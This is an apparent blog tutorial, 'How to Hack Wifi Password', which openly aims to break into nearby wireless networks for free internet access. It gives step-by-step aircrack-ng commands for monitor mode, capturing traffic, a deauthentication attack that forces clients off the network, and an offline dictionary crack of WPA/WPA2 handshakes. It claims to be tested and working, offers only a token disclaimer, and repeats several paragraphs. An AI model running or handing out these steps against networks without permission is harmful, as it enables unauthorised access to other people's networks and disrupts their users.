How to Hack Wifi Password - EASY
This is one of the fresh tutorial on wifi Hacking, many of us know there are many such wireless network present around us. So i decided why not hack those network so we can get some free internet access.
So lets begin for this you need Backtrack OS and Network Adapter (Of course it is always integrated with your laptop)
Lets do this :)
To do that, type
Command # iwconfig (to find all wireless network interfaces and their status.)
Learn more »
So lets begin for this you need Backtrack OS and Network Adapter (Of course it is always integrated with your laptop)
Lets do this :)
- Setting up your network device on your laptop
To do that, type
Command # iwconfig (to find all wireless network interfaces and their status.)
Command # airmon-ng start wlan0 (to set in monitor mode, you may have to substitute wlan0 for your own interface name)
- Reconnaissance
Command # airodump-ng mon0 (Monitors all channels, listing available access points and associated clients within range.)
- Capturing Packets
Command # airodump-ng -c 1 bssid AP_MAC -w data mon0
- De-Authentication Technique
To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:
Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0 (where MAC_AP is the MAC address of the access point, MAC_CLIENT is the MAC address of an associated client.)
- Cracking WPA/WAP2
Command # aircrack-ng -w wordlist 'capture_file'.cap (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake)
Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak pass phrases and good dictionary files.
Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable pass phrase can be broken within a few minutes using an offline dictionary attack.
This One Is Real Tested one and working perfectly so all the best hackers.
This post is only for educational purpose i am not responsible for the things, you do...
Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable pass phrase can be broken within a few minutes using an offline dictionary attack.
This One Is Real Tested one and working perfectly so all the best hackers.
This post is only for educational purpose i am not responsible for the things, you do...